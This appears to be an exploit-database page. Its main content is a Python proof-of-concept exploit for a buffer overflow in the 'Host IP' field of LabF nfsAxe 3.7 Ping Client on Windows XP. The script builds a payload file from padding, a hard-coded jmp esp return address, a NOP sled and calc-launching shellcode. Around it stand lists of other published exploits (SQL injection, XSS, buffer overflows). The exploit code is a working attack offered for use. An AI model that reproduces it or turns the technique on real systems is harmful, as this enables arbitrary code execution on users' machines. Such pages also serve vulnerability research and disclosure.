Search for hundreds of thousands of exploits

"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)"

Author

Exploit author

"Dino Covotsos"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-04-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python
# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
# Date: 20-04-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: http://www.labf.com/nfsaxe
# Version: 3.7
# Software Link : http://www.labf.com/download/nfsaxe.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP SP3 ENG x86
# CVE: TBC from Mitre
# PoC:
# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
# 3.) Click Start and calc pops
#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)

shellcode = ("\x31\xC9"                     
        "\x51"                            
        "\x68\x63\x61\x6C\x63"            
        "\x54"                            
        "\xB8\xC7\x93\xC2\x77"            
        "\xFF\xD0")                 
		
buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)

payload = buffer
try:
    f=open("nfsaxeping.txt","w")
    print "[+] Creating %s bytes ping payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2019-04-22"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)"localwindows"Dino Covotsos"
2019-04-22"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service"doshardware"Dino Covotsos"
2019-04-17"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow"remotewindows"Dino Covotsos"
2019-04-15"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow"remotewindows"Dino Covotsos"
2019-04-15"MailCarrier 2.51 - POP3 'USER' Buffer Overflow"remotewindows"Dino Covotsos"
2019-04-15"MailCarrier 2.51 - 'RCPT TO' Buffer Overflow"remotewindows"Dino Covotsos"
2019-04-15"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow"remotewindows"Dino Covotsos"
2019-04-10"FTPShell Server 6.83 - 'Account name to ban' Local Buffer"localwindows"Dino Covotsos"
2019-04-10"FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer"localwindows"Dino Covotsos"
2019-01-31"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)"localwindows"Dino Covotsos"
2019-01-31"R 3.5.0 - Local Buffer Overflow (SEH)"localwindows"Dino Covotsos"
2019-01-31"Anyburn 4.3 - 'Convert image to file format' Denial of Service"doswindows"Dino Covotsos"
2019-01-29"HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)"localwindows"Dino Covotsos"
2019-01-28"R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)"localwindows"Dino Covotsos"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46737/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.